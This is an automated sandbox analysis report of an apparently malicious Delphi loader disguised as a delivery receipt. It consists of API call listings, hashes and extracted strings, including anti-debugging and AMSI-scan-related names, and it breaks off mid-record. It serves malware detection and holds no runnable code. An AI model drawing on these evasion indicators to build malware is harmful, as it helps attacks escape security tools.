                                                                                                    • Instruction Fuzzy Hash: 7201F7316403786BF702B6748D12FAE735DDF46B20F9101E0F62CA6A94D6249E0C8A68
                                                                                                    APIs
                                                                                                      • Part of subcall function 02B23538: GetKeyboardType.USER32(00000000), ref: 02B2353D
                                                                                                      • Part of subcall function 02B23538: GetKeyboardType.USER32(00000001), ref: 02B23549
                                                                                                    • GetCommandLineA.KERNEL32 ref: 02B4C06C
                                                                                                    • GetACP.KERNEL32 ref: 02B4C080
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 02B4C08A
                                                                                                      • Part of subcall function 02B23568: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B2358A
                                                                                                      • Part of subcall function 02B23568: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02B235D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B235BD
                                                                                                      • Part of subcall function 02B23568: RegCloseKey.ADVAPI32(?,02B235E0,00000000,?,00000004,00000000,02B235D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B235D3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: KeyboardType$CloseCommandCurrentLineOpenQueryThreadValue
                                                                                                    • String ID: ()o
                                                                                                    • API String ID: 3316616684-1347693928
                                                                                                    • Opcode ID: 30211bde1758b2fed10c1403161e81695cd3e2fdc00584dfb45b8a65b0cadce2
                                                                                                    • Instruction ID: 91f0d0c4e3d5c144bcd8ed875747b4d74fa2539a981557b57b73cf4cf6e7f338
                                                                                                    • Opcode Fuzzy Hash: 30211bde1758b2fed10c1403161e81695cd3e2fdc00584dfb45b8a65b0cadce2
                                                                                                    • Instruction Fuzzy Hash: 381182B4C953A08ED312AF74619A2493F75AF13388B085CDDC5884F253E738811ECF66
                                                                                                    APIs
                                                                                                    • GetThreadLocale.KERNEL32(?,00000000,02B2AC50,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02B2AAAF
                                                                                                      • Part of subcall function 02B2A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B2A762
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Locale$InfoThread
                                                                                                    • String ID: eeee$ggg$yyyy
                                                                                                    • API String ID: 4232894706-1253427255
                                                                                                    • Opcode ID: b750038e9c89debfc4cee12a1f2013b4bcb7ad13777f4659e02d22528c5655cd
                                                                                                    • Instruction ID: 19d47aabf594e3cf978a46fec59b86228c00f9641e24902e1f6034792b09de02
                                                                                                    • Opcode Fuzzy Hash: b750038e9c89debfc4cee12a1f2013b4bcb7ad13777f4659e02d22528c5655cd
                                                                                                    • Instruction Fuzzy Hash: 7C41F2313043394BD701AB688C907BEB3FBDB85200B5455E5A47ED7714EA68E90DCA21
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B38088,?,?,00000000,?,02B379FE,ntdll,00000000,00000000,02B37A43,?,?,00000000), ref: 02B38056
                                                                                                      • Part of subcall function 02B380C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
                                                                                                      • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
                                                                                                      • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(?,?), ref: 02B38125
                                                                                                    • GetModuleHandleA.KERNELBASE(?), ref: 02B3806A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule$AddressProc
                                                                                                    • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                                    • API String ID: 1883125708-1952140341
                                                                                                    • Opcode ID: 611439da5fda73215915846b13a337ff9c093b8236d7d987a482c0b456fcc2fb
                                                                                                    • Instruction ID: 67369ba15b2ef030814d666a6cc287ed0db5d5708a1517ed16dd016d4c00d9c1
                                                                                                    • Opcode Fuzzy Hash: 611439da5fda73215915846b13a337ff9c093b8236d7d987a482c0b456fcc2fb
                                                                                                    • Instruction Fuzzy Hash: 07F09071650308BFEB02EFA8DC5195E77BEEB49B40B9149E0F508D3A10DA30AE14DA22
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(KernelBase,?,02B3EF90,UacInitialize,02B8137C,02B4AFD0,UacScan,02B8137C,02B4AFD0,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,ScanString), ref: 02B3EB92
                                                                                                    • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02B3EBA4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                    • String ID: IsDebuggerPresent$KernelBase
                                                                                                    • API String ID: 1646373207-2367923768
                                                                                                    • Opcode ID: 26a03fe9f57e4a343732b95ce0c2763a0328db9ae733b17bc54e3a23e9f858f7
                                                                                                    • Instruction ID: 4efd73a15327f5f74c5022468ea0d1c43ab416030ceddd4617969965212bb60a
                                                                                                    • Opcode Fuzzy Hash: 26a03fe9f57e4a343732b95ce0c2763a0328db9ae733b17bc54e3a23e9f858f7
                                                                                                    • Instruction Fuzzy Hash: A0D012713513601DF9037AF40CC4C9E23CD8F0552D7200EE2B027D10E1F966C8195511
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,02B4C10B,00000000,02B4C11E), ref: 02B2C3FA
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02B2C40B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                    • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                    • API String ID: 1646373207-3712701948
                                                                                                    • Opcode ID: f2a80324dfd80789de8712b32feac9ddc1184fbd5b72273787e003245f3874fd
                                                                                                    • Instruction ID: 2b1bf4ae431757d57b119d2465ed539047aab8329ff5b202203a6556dcdb15a9
                                                                                                    • Opcode Fuzzy Hash: f2a80324dfd80789de8712b32feac9ddc1184fbd5b72273787e003245f3874fd
                                                                                                    • Instruction Fuzzy Hash: 1FD05E79A403724AF700AFB168C163F2BC8A714785F0558E6F01D57101D7B1441C4F56
                                                                                                    APIs
                                                                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02B2E217
                                                                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02B2E233
                                                                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02B2E2AA
                                                                                                    • VariantClear.OLEAUT32(?), ref: 02B2E2D3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                    • String ID:
                                                                                                    • API String ID: 920484758-0
                                                                                                    • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                    • Instruction ID: 5e5334e8bcb318eabf8c51893ae59f510fa7dcc4444bf11d1c945759e12d8e69
                                                                                                    • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                    • Instruction Fuzzy Hash: 6441E775A003399BCB61DB59CC90BD9B3BDEF49205F0042E5E64DA7215DA30EF888F64
                                                                                                    APIs
                                                                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B2ACD9
                                                                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B2ACFD
                                                                                                    • GetModuleFileNameA.KERNEL32(02B20000,?,00000105), ref: 02B2AD18
                                                                                                    • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B2ADAE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 3990497365-0
                                                                                                    • Opcode ID: 5c7d029f37b619222101338d6ce81cc880e5b12ac0401df6e131c6cdf36d84ad
                                                                                                    • Instruction ID: cf617d44c66255a356b58c6b4d9fde1f39eaabb5289a385741597e4b54eb6d4f
                                                                                                    • Opcode Fuzzy Hash: 5c7d029f37b619222101338d6ce81cc880e5b12ac0401df6e131c6cdf36d84ad
                                                                                                    • Instruction Fuzzy Hash: DC410971A403689BDB21EB68CC84BDAB7FDAB08341F0444E5A64CE7245DB749F898F50
                                                                                                    APIs
                                                                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B2ACD9
                                                                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B2ACFD
                                                                                                    • GetModuleFileNameA.KERNEL32(02B20000,?,00000105), ref: 02B2AD18
                                                                                                    • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B2ADAE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 3990497365-0
                                                                                                    • Opcode ID: 6cb2393a1fe9958aa3a44a8da3819f56690c7d57dcbfb0e0f14c908b18193348
                                                                                                    • Instruction ID: 6b6e94098aae8ed03a493fe9e1b9b7019eaaa9732113d55a8b5385f4a11af88a
                                                                                                    • Opcode Fuzzy Hash: 6cb2393a1fe9958aa3a44a8da3819f56690c7d57dcbfb0e0f14c908b18193348
                                                                                                    • Instruction Fuzzy Hash: CE411871A403689BDB21EB68CC84BDAB7FDAB08341F0404E5A64CE7245DB74AF8D8F50
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 946857dcb933822409bca6afe2e70c9e6fd5c4f4945d42e3ee3e795b048f24fc
                                                                                                    • Instruction ID: b4b5eaaae65d75ed8967f4af1fe44883c9f3919e991df1f14feb89b47892d704
                                                                                                    • Opcode Fuzzy Hash: 946857dcb933822409bca6afe2e70c9e6fd5c4f4945d42e3ee3e795b048f24fc
                                                                                                    • Instruction Fuzzy Hash: 3FA1E8767317244BE718EA7C9C803ADB386DBC4265F1842FEE52DCB387DB64C9498650
                                                                                                    APIs
                                                                                                    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02B2955A), ref: 02B294F2
                                                                                                    • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02B2955A), ref: 02B294F8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DateFormatLocaleThread
                                                                                                    • String ID: yyyy
                                                                                                    • API String ID: 3303714858-3145165042
                                                                                                    • Opcode ID: 0972061e0d9b2ed601e2c39bbdb534eda00e997dfa74db4ef33f8498be0e050d
                                                                                                    • Instruction ID: 9d1cbbf1408f96dddcd1da2e1f7642d657ac21fd6c49c1a600ac0a5599dcdba9
                                                                                                    • Opcode Fuzzy Hash: 0972061e0d9b2ed601e2c39bbdb534eda00e997dfa74db4ef33f8498be0e050d
                                                                                                    • Instruction Fuzzy Hash: 10214871A007389FDB11DFA8C841AAEB3BDEF09710F6100E6E94DE7651D6349E48CAA5
                                                                                                    APIs
                                                                                                      • Part of subcall function 02B38018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B38088,?,?,00000000,?,02B379FE,ntdll,00000000,00000000,02B37A43,?,?,00000000), ref: 02B38056
                                                                                                      • Part of subcall function 02B38018: GetModuleHandleA.KERNELBASE(?), ref: 02B3806A
                                                                                                      • Part of subcall function 02B380C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
                                                                                                      • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
                                                                                                      • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(?,?), ref: 02B38125
                                                                                                    • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B3820E), ref: 02B381F0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                                                    • String ID: FlushInstructionCache$Kernel32
                                                                                                    • API String ID: 3811539418-184458249
                                                                                                    • Opcode ID: 32eec884ed6b14f541f9d469b161884c9a881a05f8b0b60313e9e03fea32d17b
                                                                                                    • Instruction ID: 6cf90b896b93ff660f3034bd11dd4324f15742d64e29f41b7a1fc2a00ec1096f
                                                                                                    • Opcode Fuzzy Hash: 32eec884ed6b14f541f9d469b161884c9a881a05f8b0b60313e9e03fea32d17b
                                                                                                    • Instruction Fuzzy Hash: E9016D75650704BFEB02EFA8DC41F5A77ADEB48B10F5184A0B508E7A40D634AD14CA21
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocValue
                                                                                                    • String ID: Pyq
                                                                                                    • API String ID: 1189806713-1241674935
                                                                                                    • Opcode ID: 19dc40705e774793db41613219259b414d9bb1183889fa99e42f087d3072a950
                                                                                                    • Instruction ID: 77c502de16b857a573282862e186b95491de997d97a6a4e3b3603ef08c64cf2b
                                                                                                    • Opcode Fuzzy Hash: 19dc40705e774793db41613219259b414d9bb1183889fa99e42f087d3072a950
                                                                                                    • Instruction Fuzzy Hash: 8CC002B4E40322CAEF01BBB99544A093BDDEB04385F049DA5B468C7148EB35D41DDF54
                                                                                                    APIs
                                                                                                    • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B3AD90
                                                                                                    • IsBadWritePtr.KERNEL32(?,00000004), ref: 02B3ADC0
                                                                                                    • IsBadReadPtr.KERNEL32(?,00000008), ref: 02B3ADDF
                                                                                                    • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B3ADEB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Read$Write
                                                                                                    • String ID:
                                                                                                    • API String ID: 3448952669-0
                                                                                                    • Opcode ID: a93baf0632f810e868fc304dc02f88cb2819ea7b8e0cd4cec62af5963c9676e9
                                                                                                    • Instruction ID: af0077796bfbd479a69f6cb7f1f1febcd90d632b3f413e8c0751cdb26ecd95e3
                                                                                                    • Opcode Fuzzy Hash: a93baf0632f810e868fc304dc02f88cb2819ea7b8e0cd4cec62af5963c9676e9
                                                                                                    • Instruction Fuzzy Hash: 9121D6B16403199BDB12DF29CC80BAE73B9EF40311F108191FE9497344DB38ED119AA0

                                                                                                    Execution Graph

                                                                                                    Execution Coverage: 1.2%
                                                                                                    Dynamic/Decrypted Code Coverage: 4.6%
                                                                                                    Signature Coverage: 3.9%
                                                                                                    Total number of Nodes: 152
                                                                                                    Total number of Limit Nodes: 13
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000001.2169352887.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_1_400000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @$B$a```$gfff$gfff$gfff$gfff
                                                                                                    • API String ID: 0-3667867154
                                                                                                    • Opcode ID: 50a344c5d8cad1bac2f9cdccde6dd67feee0f91bdaaa4a749f4ed1f71307396b
                                                                                                    • Instruction ID: 4d4c1e64281832a49f187a404ecdf2e47e159528420c40e4fc39f5ea6f09713e
                                                                                                    • Opcode Fuzzy Hash: 50a344c5d8cad1bac2f9cdccde6dd67feee0f91bdaaa4a749f4ed1f71307396b
                                                                                                    • Instruction Fuzzy Hash: 3C021771F0011947DB2C9959CC95BFE726AE794304F5881BBEA0AEF3E1E6389F448B44

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    APIs
                                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BA5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2639223190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_400000_hdcleziT.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Load
                                                                                                    • String ID:
                                                                                                    • API String ID: 2234796835-0
                                                                                                    • Opcode ID: 9d75b0684c7b2c85136cce4d19a8f736d81c15d4d2bc0a663619e57a58b04cfb
                                                                                                    • Instruction ID: 331d18eb78583633b9e29c6af9a4f26b0dc20ce173b82e1c0a0b08c061dba126
                                                                                                    • Opcode Fuzzy Hash: 9d75b0684c7b2c85136cce4d19a8f736d81c15d4d2bc0a663619e57a58b04cfb
                                                                                                    • Instruction Fuzzy Hash: 780112B5E4410DA7DB10DAA5DC42FDEB3789F54708F0041A6E90897240F635EB588795

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 158 42cb13-42cb4f call 404973 call 42dd63 NtClose
                                                                                                    APIs
                                                                                                    • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CB4A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2639223190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_400000_hdcleziT.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Close
                                                                                                    • String ID:
                                                                                                    • API String ID: 3535843008-0
                                                                                                    • Opcode ID: 621a3b87d4f233dfb6b6f7d7240c0c3b66d092fca9b72b9a237939f90996aef9
                                                                                                    • Instruction ID: 71597bb0a06a303982d629d451bdfe7f1673587ba4a769b47156b06249900e13
